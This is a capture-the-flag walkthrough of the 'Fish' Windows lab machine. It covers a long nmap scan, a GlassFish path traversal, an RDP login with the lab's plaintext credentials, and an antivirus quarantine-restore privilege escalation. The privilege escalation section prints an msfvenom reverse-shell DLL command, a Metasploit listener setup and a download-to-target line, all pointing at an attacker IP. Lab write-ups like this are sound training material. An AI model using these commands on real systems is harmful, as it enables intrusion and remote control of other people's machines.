Fish Walkthrough
Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)
🛰️ 1. Scanning
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fishyyy
| Issuer: commonName=Fishyyy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-29T04:54:04
| Not valid after: 2022-04-30T04:54:04
| MD5: 588e:de0b:ff8c:3e4a:cec6:f67d:24cb:6575
| SHA-1: a80d:768d:a75e:6cbf:c992:be2b:2b80:5b6c:331b:4c08
| -----BEGIN CERTIFICATE-----
| MIIC0jCCAbqgAwIBAgIQQOJ8UNRaEotI7C7G29vXyTANBgkqhkiG9w0BAQsFADAS
| MRAwDgYDVQQDEwdGaXNoeXl5MB4XDTIxMTAyOTA0NTQwNFoXDTIyMDQzMDA0NTQw
| NFowEjEQMA4GA1UEAxMHRmlzaHl5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
| AQoCggEBAMgPuZ0RK7xDfalP49x2PiCVA002X+r0W4l+r7vOe1glNaa2nm8pD0tB
| a/bsbf5+8KU26dBugXKU4eNLarQNI7XAlBv9wT/VBijwvwyvZI8bZUDDoBtq4zD5
| ldCisCQ9qE+oZqXQrsMlGlLEqvpNDm5E3DzXTKRKrlUUUDeH9PJyTPSLZjx3mnId
| cRLmfQvf06y4qJe6xC+2Nl5cCHyLEYg2XE6cjvY4g+Z60MSd6p4X0b7bRdd/YZ8+
| yybTYDIzXN4/Sh2A/Ck8jXAG6x8vj/n+XHSh63pUpsZtcvmsHM/xltZyqGoqwRHz
| UROW20D5RabKUruzxKz2AKqGXgdjSt0CAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYB
| BQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQChNrpEbXCoI3/G
| XOf/evHABHkZRPAiepx6ZReshk84PgnWWbSqFFk7PSU32tSiwYU+ku+RGwo08CP+
| bFVEJGtei2Henwnp+7aptJJaERqtbb9SyQubApWElGOdfaXzPmutxSRZwoWqVv/H
| Pjnivn9Uqg+jTvzYJuz8dwvfvhgVz47PGHfMVggXyHimM7zW6uX8MdcPOlGc/bIk
| 3bFHq2imTlmUcCIAEqaZMVvBkpnFmK4ZFYzQwcNjN2Uh1SgHAMGck5XAmtxdwXew
| n+qmqL/f8SgxiDDC5bqkow8qPAJViSfzOItrVc2/HuFWbAJf/e5PRMG/dAMY5ELu
| UjqYpSZu
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: FISHYYY
| NetBIOS_Domain_Name: FISHYYY
| NetBIOS_Computer_Name: FISHYYY
| DNS_Domain_Name: Fishyyy
| DNS_Computer_Name: Fishyyy
| Product_Version: 10.0.19041
|_ System_Time: 2021-10-30T05:09:01+00:00
|_ssl-date: 2021-10-30T05:09:17+00:00; -3y340d05h52m55s from scanner time.
3700/tcp open giop syn-ack ttl 125
| fingerprint-strings:
| GetRequest, X11Probe:
| GIOP
| giop:
| GIOP
| (IDL:omg.org/SendingContext/CodeBase:1.0
| 169.254.99.240
| 169.254.99.240
|_ default
4848/tcp open http syn-ack ttl 125 Sun GlassFish Open Source Edition 4.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-title: Login
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: B0072A41A4A7027F185EE05F78C7B971
5040/tcp open unknown syn-ack ttl 125
6060/tcp open x11? syn-ack ttl 125
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"425-1267803922000"
| Last-Modified: Fri, 05 Mar 2010 15:45:22 GMT
| Content-Type: text/html
| Content-Length: 425
| Date: Sat, 30 Oct 2021 05:06:28 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <html>
| <head>
| <META HTTP-EQUIV="REFRESH" CONTENT="1;URL=app">
| </head>
| <body>
| <script type="text/javascript">
| <!--
| currentLocation = window.location.pathname;
| if(currentLocation.charAt(currentLocation.length - 1) == "/"){
| window.location = window.location + "app";
| }else{
| window.location = window.location + "/app";
| //-->
| </script>
| Loading Administration console. Please wait...
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 403
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Set-Cookie: JSESSIONID=0984AA8E65F19F930C67728EEA1E576D; Path=/
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 5028
| Date: Sat, 30 Oct 2021 05:06:29 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <!DOCTYPE html>
| <html>
| <head>
| <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
| <title>
| SynaMan - Synametrics File Manager - Version: 5.1 - build 1595
| </title>
| <meta NAME="Description" CONTENT="SynaMan - Synametrics File Manager" />
| <meta NAME="Keywords" CONTENT="SynaMan - Synametrics File Manager" />
| <meta http-equiv="X-UA-Compatible" content="IE=10" />
| <link rel="icon" type="image/png" href="images/favicon.png">
| <link type="text/css" rel="stylesheet" href="images/AjaxFileExplorer.css">
| <link rel="stylesheet" type="text/css"
| JavaRMI:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Length: 145
| Date: Sat, 30 Oct 2021 05:06:23 GMT
| Connection: close
| Server: Synametrics Web Server v7
|_ <html><head><title>Oops</title><body><h1>Oops</h1><p>Well, that didn't go as we had expected.</p><p>This error has been logged.</p></body></html>
7676/tcp open java-message-service syn-ack ttl 125 Java Message Service 301
8080/tcp open http syn-ack ttl 125 Sun GlassFish Open Source Edition 4.1
|_http-title: Data Web
|_http-server-header: GlassFish Server Open Source Edition 4.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
8181/tcp open ssl/http syn-ack ttl 125 Sun GlassFish Open Source Edition 4.1
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US/organizationalUnitName=GlassFish/localityName=Santa Clara
| Issuer: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US/organizationalUnitName=GlassFish/localityName=Santa Clara
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2014-08-21T13:30:10
| Not valid after: 2024-08-18T13:30:10
| MD5: 594f:8111:2179:0c71:532a:00ab:223e:0e8a
| SHA-1: 1ff8:eff1:b17d:c744:191e:213a:3102:9aa7:5982:a63c
| -----BEGIN CERTIFICATE-----
| MIIDmTCCAoGgAwIBAgIEMeuNnzANBgkqhkiG9w0BAQsFADB9MQswCQYDVQQGEwJV
| UzETMBEGA1UECBMKQ2FsaWZvcm5pYTEUMBIGA1UEBxMLU2FudGEgQ2xhcmExGzAZ
| BgNVBAoTEk9yYWNsZSBDb3Jwb3JhdGlvbjESMBAGA1UECxMJR2xhc3NGaXNoMRIw
| EAYDVQQDEwlsb2NhbGhvc3QwHhcNMTQwODIxMTMzMDEwWhcNMjQwODE4MTMzMDEw
| WjB9MQswCQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEUMBIGA1UEBxML
| U2FudGEgQ2xhcmExGzAZBgNVBAoTEk9yYWNsZSBDb3Jwb3JhdGlvbjESMBAGA1UE
| CxMJR2xhc3NGaXNoMRIwEAYDVQQDEwlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQCWpLMWHmNZb8HNZ95LmBfkyMKcJlpn8AWajtEui7yV
| XdR7o+N2mpx/dP1SX1fkKPVM+rmbMCV6jkNHyKX7uam1YtnlKpM0Hc3jQT1S03p2
| pWTLusK9Tr+sMQf4E7J0EUNM/TaPvyB0P+2d65mdVPdMxX19KKpfkJ26fLMtzyBp
| W2mvVzVWgYfrjXPv7RVGayX2Ii7FC7VWC3xCiOKg6vT+kfw7uxOWhsp/utu7Aoo/
| vHFTbM1ZeocTshlaFsqjTOYH0wMfVibEICca6nuC88OzE5aOnklMZXxyURivh/Qq
| C+e8IIhqtGWIQV91KdhgqVp+g7HgpJzvm03r2c41BidBAgMBAAGjITAfMB0GA1Ud
| DgQWBBQTVdt9qTFxozNAVtNJqXdCkKNZOTANBgkqhkiG9w0BAQsFAAOCAQEAB+Xx
| ljjOVTMcZaVaOJDrmFmhrhlfv19Tvs82VC8DXV6dITzczMmhXuALcTE2zjrbu3hA
| 7Vv7CvDmAVrDKc0L4aENqZnt2Ch42hsvFSVGhdizj+d5D+83alUG4C0MZ/NgRqvC
| 9axwXp887+MzYTTE+ctagxCC5drzFR0osvneU/AQcnlIurSs7EkWktimSLWnOm83
| FQL0ZmaUjIIsV3pFBDMx9pt8agSwCgGOjrkxnpqsU/fLOPbl24b/8tg5dzRHX3/s
| 8zd5COtZtZA/2X7ocMP03RfstBnQCCZ+y2RGF7gI2KeZHs/xK3mG8SJvxAWU4U/h
| ZOTwR42VlQhP/vlg5A==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_http-title: Data Web
|_http-server-header: GlassFish Server Open Source Edition 4.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
8686/tcp open java-rmi syn-ack ttl 125 Java RMI
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @169.254.99.240:8686
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49723/tcp open http syn-ack ttl 125 JBoss Enterprise Application Platform
| http-methods:
|_ Supported Methods: GET
|_http-title: Site doesn't have a title.
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3700-TCP:V=7.95%I=7%D=10/5%Time=68E24F8B%P=aarch64-unknown-linux-gn
SF:u%r(GetRequest,C,"GIOP\x01\x02\0\x06\0\0\0\0")%r(X11Probe,C,"GIOP\x01\x
SF:02\0\x06\0\0\0\0")%r(giop,D0C,"GIOP\x01\0\0\x01\0\0\r\0\0\0\0\x03NEO\0\
SF:0\0\0\x02\0\x14\0\0\0\0\0\x06\0\0\x01P\0\0\0\0\0\0\0\(IDL:omg\.org/Send
SF:ingContext/CodeBase:1\.0\0\0\0\0\x01\0\0\0\0\0\0\x01\x14\0\x01\x02\0\0\
SF:0\0\x0f169\.254\.99\.240\0\0\x0et\0\0\0\0\0\x19\xaf\xab\xcb\0\0\0\0\x02
SF:\0\0\0d\0\0\0\x08\0\0\0\0\0\0\0\0\x14\0\0\0\0\0\0\x05\0\0\0\x01\0\0\0\x
SF:20\0\0\0\0\0\x01\0\x01\0\0\0\x02\x05\x01\0\x01\0\x01\0\x20\0\x01\x01\t\
SF:0\0\0\x01\0\x01\x01\0\0\0\0&\0\0\0\x02\0\x02\0\0\0\0\0!\0\0\0\x80\0\0\0
SF:\0\0\0\0\x01\0\0\0\0\0\0\0\$\0\0\0\"\0\0\0f\0\0\0\0\0\0\0\x01\0\0\0\x0f
SF:169\.254\.99\.240\0\0\x0e\xec\0@\0\0\0\0\0\0\0\x08\x06\x06g\x81\x02\x01
SF:\x01\x01\0\0\0\x17\x04\x01\0\x08\x06\x06g\x81\x02\x01\x01\x01\0\0\0\x07
SF:default\0\x04\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x08\x06\x06g\x81\x02\x01\x0
SF:1\x01\0\0\0\x0f\0\0\0\x1f\0\0\0\x04\0\0\0\x03\0\0\0\x20\0\0\0\x04\0\0\0
SF:\x01\0\0\0\x0e\0\0\x0bR\0\0\0\0\0\0\x0bJ\0o\0r\0g\0\.\0o\0m\0g\0\.\0C\0
SF:O\0R\0B\0A\0\.\0O\0B\0J\0E\0C\0T\0_\0N\0O\0T\0_\0E\0X\0I\0S\0T\0:\0\x20
SF:\0F\0I\0N\0E\0:\0\x20\x000\x002\x005\x001\x000\x000\x000\x002\0:\0\x20\
SF:0T\0h\0e\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0I\0D\0\x20\0i\0n\0\x20\0t\0h\0e
SF:\0\x20\0t\0a\0r\0g\0e\0t\0\x20\0o\0b\0j\0e\0c\0t\0\x20\0k\0e\0y\0\x20\0
SF:d\0o\0e\0s\0\x20\0n\0o\0t\0\x20\0m\0a\0t\0c\0h\0\x20\0t\0h\0e\0\x20\0s\
SF:0e\0r\0v\0e\0r\0\x20\0k\0e\0y\0\x20\0e\0x\0p\0e\0c\0t\0e\0d\0\x20\0b\0y
SF:\0\x20\0t\0h\0e\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0\x20\0v\0m\0c\0i\0d\0:\0
SF:\x20\0O\0M\0G\0\x20\0\x20\0m\0i\0n\0o\0r\0\x20\0c\0o\0d\0e\0:\0\x20\x00
SF:2\0\x20\0\x20\0c\0o\0m\0p\0l\0e\0t\0e\0d\0:\0\x20\0N\0o\0\r\0\n\0\t\0a\
SF:0t\0\x20\0c\0o\0m\0\.\0s\0u\0n\0\.\0p\0r\0o\0x\0y\0\.\0\$\0P\0r\0o\0x\0
SF:y\x001\x004\x000\0\.\0b\0a\0d\0S\0e\0r\0v\0e\0r\0I\0d\0\(\0U\0n\0k\0n\0
SF:o\0w\0n\0\x20\0S\0o\0u\0r\0c\0e\0\)\0\r\0\n\0\t\0a\0t\0\x20\0c\0o\0m\0\
SF:.\0s\0u\0n\0\.\0c\0o\0r\0b");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port6060-TCP:V=7.95%I=7%D=10/5%Time=68E24F86%P=aarch64-unknown-linux-gn
SF:u%r(JavaRMI,139,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;cha
SF:rset=utf-8\r\nContent-Length:\x20145\r\nDate:\x20Sat,\x2030\x20Oct\x202
SF:021\x2005:06:23\x20GMT\r\nConnection:\x20close\r\nServer:\x20Synametric
SF:s\x20Web\x20Server\x20v7\r\n\r\n<html><head><title>Oops</title><body><h
SF:1>Oops</h1><p>Well,\x20that\x20didn't\x20go\x20as\x20we\x20had\x20expec
SF:ted\.</p><p>This\x20error\x20has\x20been\x20logged\.</p></body></html>"
SF:)%r(GetRequest,2A4,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\n
SF:ETag:\x20W/\"425-1267803922000\"\r\nLast-Modified:\x20Fri,\x2005\x20Mar
SF:\x202010\x2015:45:22\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Le
SF:ngth:\x20425\r\nDate:\x20Sat,\x2030\x20Oct\x202021\x2005:06:28\x20GMT\r
SF:\nConnection:\x20close\r\nServer:\x20Synametrics\x20Web\x20Server\x20v7
SF:\r\n\r\n<html>\r\n<head>\r\n<META\x20HTTP-EQUIV=\"REFRESH\"\x20CONTENT=
SF:\"1;URL=app\">\r\n</head>\r\n<body>\r\n\r\n<script\x20type=\"text/javas
SF:cript\">\r\n<!--\r\n\r\nvar\x20currentLocation\x20=\x20window\.location
SF:\.pathname;\r\nif\(currentLocation\.charAt\(currentLocation\.length\x20
SF:-\x201\)\x20==\x20\"/\"\){\r\n\twindow\.location\x20=\x20window\.locati
SF:on\x20\+\x20\"app\";\r\n}else{\r\n\twindow\.location\x20=\x20window\.lo
SF:cation\x20\+\x20\"/app\";\r\n}\x20\r\n//-->\r\n</script>\r\n\r\nLoading
SF:\x20Administration\x20console\.\x20Please\x20wait\.\.\.\r\n</body>\r\n<
SF:/html>")%r(HTTPOptions,12E8,"HTTP/1\.1\x20403\x20\r\nCache-Control:\x20
SF:private\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\n
SF:Set-Cookie:\x20JSESSIONID=0984AA8E65F19F930C67728EEA1E576D;\x20Path=/\r
SF:\nContent-Type:\x20text/html;charset=ISO-8859-1\r\nContent-Length:\x205
SF:028\r\nDate:\x20Sat,\x2030\x20Oct\x202021\x2005:06:29\x20GMT\r\nConnect
SF:ion:\x20close\r\nServer:\x20Synametrics\x20Web\x20Server\x20v7\r\n\r\n<
SF:!DOCTYPE\x20html>\r\n\r\n\r\n<html>\r\n<head>\r\n<meta\x20http-equiv=\"
SF:content-type\"\x20content=\"text/html;\x20charset=UTF-8\"\x20/>\r\n<tit
SF:le>\r\nSynaMan\x20-\x20Synametrics\x20File\x20Manager\x20-\x20Version:\
SF:x205\.1\x20-\x20build\x201595\x20\r\n</title>\r\n\r\n\r\n<meta\x20NAME=
SF:\"Description\"\x20CONTENT=\"SynaMan\x20-\x20Synametrics\x20File\x20Man
SF:ager\"\x20/>\r\n<meta\x20NAME=\"Keywords\"\x20CONTENT=\"SynaMan\x20-\x2
SF:0Synametrics\x20File\x20Manager\"\x20/>\r\n\r\n\r\n<meta\x20http-equiv=
SF:\"X-UA-Compatible\"\x20content=\"IE=10\"\x20/>\r\n\r\n\r\n\r\n<link\x20
SF:rel=\"icon\"\x20type=\"image/png\"\x20href=\"images/favicon\.png\">\r\n
SF:\x20\r\n\x20\r\n\r\n<link\x20type=\"text/css\"\x20rel=\"stylesheet\"\x2
SF:0href=\"images/AjaxFileExplorer\.css\">\r\n\r\n\r\n\r\n<link\x20rel=\"s
SF:tylesheet\"\x20type=\"text/css\"\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 53168/tcp): CLEAN (Couldn't connect)
| Check 2 (port 63680/tcp): CLEAN (Couldn't connect)
| Check 3 (port 28564/udp): CLEAN (Failed to receive data)
| Check 4 (port 20524/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1436d05h52m55s, deviation: 0s, median: -1436d05h52m55s
| smb2-time:
| date: 2021-10-30T05:09:02
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
2. Enumeration
We'll enumearte from bottom to top as our scanning results.
SMB enumeration
Does not seem to have any NULL session.
HTTP enumeration 4848
Directly redirecting to a login portal.
While looking at the exploits I found this metasploit exploit for path traversal.
We only need to provide the RHOST and the file that we want to read.
Executing the above exploit looks like we can read the file.
What we need to do now is to find out juicy information from the windows server.
So Looks like we can traverse all paths and information too.
Looking further into it.
Now I have a password and a user.
Initial Access
Using the found user and pass we can RDP in the machine.
└─$ xfreerdp3 /u:arthur /p:'KingOfAtlantis' /v:192.168.238.168 /timeout:6000
Privilege escalation
While looking through the tasks running found this AV which stands out.
when checked with searchsploit found this exploit
Below is the instruction to execute the exploit.
So as per the exploit detail:
We need to create a malicious DLL
Start listner in our kali
Put that malicious dll in a folder in windows
Scan using antivirus
Put it in the Qurantine once threat is found
Use tool CreateMountPoint.exe to create a mount point to the .Net Framework
Restore the exploit back from the antivirus
Restart the machine.
Create malicious DLL
in this case we are creating dll using msfvenom
└─$ msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.45.157 LPORT=4443 -f dll > condo_exploit.dll
Start your listner in kali machine.
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.45.157
LHOST => 192.168.45.157
msf exploit(multi/handler) > set LPORT 4443
LPORT => 4443
Download the exploit
iwr -uri http://192.168.45.157/condo_exploit.dll -Outfile version.dll
Attempt to scan the dll file
And put this is quarantine so the folder will be empty
Create a mount point using createMountPoint.exe
Once the mount point is created then you can restore the file from the antivirus and it will be updated here.
Restart the machine to execute the exploit.
We get the shell as soon as it executes.